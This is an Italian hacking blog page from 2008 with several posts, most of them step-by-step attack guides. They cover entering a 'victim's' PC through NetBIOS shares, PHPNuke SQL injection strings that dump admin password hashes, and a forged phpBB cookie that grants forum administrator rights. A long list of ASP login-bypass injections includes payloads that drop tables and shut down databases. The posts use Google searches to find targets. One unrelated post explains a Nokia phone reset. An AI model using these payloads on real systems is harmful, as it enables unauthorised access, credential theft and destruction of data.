h4ckarchive security blog

Remote Penetration: Entrare in PC altrui con la porta 139 (NetBios)

TheDevil — Tue, 16 Sep 2008 20:33:54 +0000

Prima di tutto, prelevate l’IP della vittima.

Fate una scansione dell’IP per vedere se la porta 139 del PC della vittima è aperta con un port scanner (potete usare Nmap sia per Linux che per Windows).

Appena avete trovato la porta 139 aperta, apriamo il prompt di comandi andando su Start -> Esegui -> cmd.exe.

Digitate: cd C:\Windows
Digitate: Nbtstat -A “IP” (l’ip della vittima con la porta 139 aperta)
Adesso comparirà una tabella con nome, tipo e stato… prendiamo nota del nome dell’IP della nostra vittima
Adesso digitate: Edit C:\windows\lmhosts
Adesso nel file da modificare (nella schermata blu) inseriamo: “IP””NOME DELL’IP DELLA VITTIMA”#PRE
Appena avete finito, andate su File -> Salva e uscite (File -> Esci)
Digitate: Nbtstat -R
Digitate: Net View \\”NOME DELL’IP DELLA VITTIMA”
Se non avete sbagliato, vi uscirà la lista delle periferiche condivise (stampanti, HD…)
Ora basta andare in Risorse di Rete -> Strumenti -> Connetti ad unità di rete e inserite come nome dell’unità rete: \\”NOME DELL’IP DELLA VITTIMA”\C
L’unità C è condivisa nel vostro PC.

SQL: PHPNuke 7.2 – 7.6 SQL Injection

TheDevil — Tue, 16 Sep 2008 20:21:38 +0000

Ecco una vulnerabilità SQL ben nota che affligge PHPNuke 7.2 e PHPNuke 7.6.

Come trovare siti PHPNuke?

Cercate su Google Powered by PHPNuke.

Versioni PHPNuke 7.2: Sfruttando il bug Cerca/Search

Appena abbiamo trovato il sito giusto, andiamo sulla pagina Cerca o Search del sito web..

Inseriamo una stringa sul modulo di ricerca, che permette di chiedere al database SQL, di mostrarci i nomi degli admin con le password… la stringa è questa: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

Ora ci verrà mostrata una pagina con tutti i nomi degli admin con delle scritte blu linkabili. Se la versione del Nuke è vecchia, vedrete direttamente le password, se invece è più nuova, vedrete tanti numeri e lettere, ciò significa che è criptata in MD5, per decryptarla vi consiglio www.passcracking.ru.

Versioni PHPNuke 7.6: Sfruttando il bug Top 10.

Appena troviamo il sito giusto da hackerare, andiamo nella pagina Top 10 del sito
web. Inseriamo questa stringa, che chiede al database SQL di mostrare le password (criptate in MD5): &querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors

L’indirizzo della pagina web con la stringa dovrebbe essere questo:
www.sitoweb.com/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors

Phreaking: Eseguire una formattazione completa su Nokia

ToxicMind — Mon, 15 Sep 2008 13:22:45 +0000

Con queste semplici istruzioni saremo in grado di eseguire una formattazione di tipo “completo” sul nostro cellulare Symbian.
Nota bene
Prima di poter effettuare la formattazione, è cosa buona e giusta:
1) avere la batteria completamente carica;
2) eseguire un backup di tutti i dati e passarli sulla memory stick in modo da non perderli;
3) sapere i codici di sicurezza del cellulare.
- quelli standard sono:

0000
1234
12345

Adesso bisognerà spegnere il cellulare e riaccenderlo tenendo premuti i tasti segnalati con il bollino rosso affinchè non appaia formatting sul display.
Al termine della formattazione in cellulare si riavvierà automaticamente e tornerà come nuovo.

Questa formattazione è stata testata su parecchi Nokia con sistema operativo Symbian solo che a differenza del Nokia 6600 non vi apparirà formatting. Però la formattazione avrà lo stesso buon esito.

Cookie Stealing: phpBB v1 e phpBB v2

TheDevil — Mon, 15 Sep 2008 12:38:23 +0000

In questa guida spiegherò brevemente come diventare amministratori su forum phpBB v1 e v2, utilizzando Mozilla Firefox. Questo tipo di attacco funziona solo con i forum non fixati per i cookie.

Prima di tutto andiamo su Google per cercare un forum phpBB scrivendo “Powered By Phpbb 1.0.12“. Adesso svuotate i cookie andando su Strumenti > Opzioni > Privacy > Svuota cookie adesso.

Una volta trovato andiamo nella pagina iniziale del forum ovvero www.forum.com/index.php. Andate su C:\Documents And Settings\User\Dati Applicazioni\Mozilla\Firefox\Cartella*

Aprite la cartella presente (è normale che abbia tanti numeri e lettere messe a caso). Adesso aprite il file cookie.txt e cercate la stringa phpbb2mysql_data. Se avete trovato la stringa, avrete notato che è seguita da un’altra stringa che dovrebbe essere qualcosa del genere: a%3A0%3A%7B%7D

Adesso sostitute a%3A0%3A%7B%7D (la stringa che la segue) con a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Salvate il file e chiudete il file di testo. Chiudete adesso tutte le sessioni di Firefox. Riaprite Firefox e tornate sulla pagina del forum. Adesso dovreste essere amministratori, e potete anche andare sul pannello di amministrazione del forum.

Testato con Mozilla Firefox 2.

SQL: ASP SQL Injection

TheDevil — Mon, 15 Sep 2008 12:16:47 +0000

Oggi, tratterò di un argomento abbastanza diffuso, ovvero l’SQL Injection su siti creati in ASP… spiegherò come avviene.

Innanzitutto, cos’è l’SQL Injection? L’SQL injection è un exploit mirato a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l’inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all’interno di una query SQL. Le conseguenze prodotte sono imprevedibili per il programmatore: l’SQL Injection permette al malintenzionato di autenticarsi con ampi privilegi in aree protette del sito (ovviamente, anche senza essere in possesso delle credenziali d’accesso) e di visualizzare e/o alterare dati sensibili. Ecco come avviene, e come i malintenzionati riescono a loggarsi come admin tramite delle query:

1) Andiamo su Google e cerchiamo inurl:login.asp oppure inurl:admin.asp

2) Clicchiamo su un risultato qualsiasi, e dovremmo entrare nel login di un sito web in ASP

3) Possiamo ora inserire la query (username e password), esempio:

Username: admin

Password: ‘or’

4) Se funziona siete entrati con successo come amministratore!

Ecco le altre query (username e password):

Nome: ‘ OR ”=’
Password: ‘ OR ”=’
Query Risultante :
SELECT * FROM Utenti WHERE nome= ‘ ‘ OR ”=’ ‘ AND password=” OR ”=’ ‘
Effetto si viene identificati con il primo record del database

Nome: ‘ OR ‘1A=’1
Password: ‘ OR ‘1A=’1
Query Risultante:
SELECT * FROM Utenti WHERE nome= ” OR ‘1A=’1 ‘ AND password=” OR ‘1A=’1 ‘
Effetto = si viene identificati con il primo record del database

Nome: ‘ or ‘1=1 —
Password: ‘ or ‘1=1 —
Query Risultante:
SELECT * FROM Utenti WHERE nome= ” or ‘1=1 — ‘ AND password=” or ‘1=1 —’
Effetto = si viene identificati con il primo record del database

Nome:’ or Nome like ‘%%
Password: ‘ or Nome like ‘%%
Query Risultante:
SELECT * FROM Utenti WHERE nome= ” or Nome like ‘%% ‘ AND password=” or
Nome like ‘%%’
Effetto = si viene identificati con il primo record del database

Nome: [stringa nulla]
Password: ‘ OR ‘Attacco’ LIKE ‘Att%
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ ‘ AND password=” OR ‘Attacco’ LIKE
‘Att%’
Effetto = Autenticazione come utente admin

Nome:[una stringa qualsiasi]
Password: c’ OR ‘ TRUE—
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ ‘ AND password=’c’ OR ‘ TRUE—’
Effetto = si viene identificati con il primo record del database

Nome: admin’ –
Password: [stringa nulla]
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ admin’ –’ AND password=’ ‘
Effetto = Autenticazione come utente admin

Nome: ‘ OR ‘Attacco’ > ‘A
Password: ‘ OR ‘Attacco’ > ‘A
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ ‘ OR ‘Attacco’ > ‘A’ AND password=”OR
‘Attacco’ > ‘A’
Effetto = Autenticazione come utente admin

Nome: ‘ ; drop table utenti–
Password: [stringa nulla]
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ ‘ ; drop table utenti–’ AND password=’ ‘
Effetti = Eliminazione della tabella dal database

Nome: aaaaaaaaaaaaaaa’
Password: ‘ ; shutdown –
Query Risultante:
SELECT * FROM Utenti WHERE nome= ‘ aaaaaaaaaaaaaaa” AND password=” ;
shutdown –’
Effetto = Chiusura del database